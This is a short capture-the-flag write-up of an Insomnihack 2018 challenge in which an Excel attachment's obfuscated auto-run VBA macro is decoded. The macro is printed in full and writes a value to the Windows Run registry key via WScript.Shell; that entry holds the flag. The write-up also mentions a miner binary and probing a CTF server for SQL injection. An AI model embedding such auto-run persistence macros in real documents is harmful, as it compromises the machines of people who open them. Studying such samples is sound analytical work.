Insomnihack CTF 2018

vba01-baby

The challenge:

“Help, I’ve accidentally opened an email attachment, help me find out what happened”

We are given a XLS sheet with macro enabled.

Nothing suspicious in the Worksheet.

At this point it is wise to proceed in a Windows VM, because macros will run as soon as the document is opened, once they are enabled. Let’s edit the macro:

Macro

Sub Workbook_Open()
    a ("Sheet1")
End Sub

Private Function a(ByVal aaaaaaaa As String) As String
    Dim aa As Integer
    Dim aaaa As String
    Dim aaaaaa As Worksheet
    Dim aaaaaaa() As String
    
    On Error GoTo e
    Set aaaaaa = Worksheets(aaaaaaaa)
    aa = 874104 / 220128
    aaa = 1
    strHex = ""
    Do While aaaaaa.Columns(aaa).Cells(aa, Int(221892 / 139112)).Value <> ""
        Do While aaaaaa.Columns(aaa).Cells(aa, Int(291792 / 189112)).Value <> ""
            aaaa = aaaa + Chr(aaaaaa.Columns(aaa).Cells(aa, 1).Value Xor ((37 Xor 12) + 1))
            aaa = aaa + Int(218526 / 213912)
        Loop
        aa = aa + Int(18526 / 13912)
        aaa = Int(199526 / 139112)
    Loop
    aaaaaaa = Split(aaaa, Chr(54 Xor 12))
    Set aaaaa = CreateObject(aaaaaaa(0))
    aaaaa.RegWrite aaaaaaa(1), aaaaaaa(2), "REG_SZ"
    Exit Function
e:
    Exit Function
End Function

Interestingly enough, the payload is generated from cells contents. VBA language is used for macros and printing the output of the function is not as straightforward, but we can direct the payload content into a cell, to see what’s happening. Looking online, you can find samples how it is done, if you are not familiar with VBA. Adding Cells(1, 1) = aaaaaaa(0) + aaaaaaa(1) + aaaaaaa(2) after regwrite, we dump the string into the first cell. Now run it!

WScript.ShellHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
flagINS{Do_n0t_Ena8le_M4cro}

Extra

• vba02-bitminer was a similar chall, except that the result of the payload was a “miner” executable. After disassembly it was difficult to see any magic strings, so I did the only reasonable thing - running it, and inspecting the packet sent on Wireshark. The recipient being bitminer.insomni.hack , which greeted requests not matching the format with “Go away hacker” text. I was able to craft my own POST requests on the API with arbitrary parameters, and the error messages indicated it was an SQL DB, but with 15 minutes remaining I didn’t go through with blind SQL injection.

• My first Insomnihack was a success, I’ve completed 2 challenges(the other being backdoor) on my own right and the rest of the team contributed 1 flag. Being one of the first 15 to complete this chall, I enjoyed the limelight in such a big event on the scoreboard.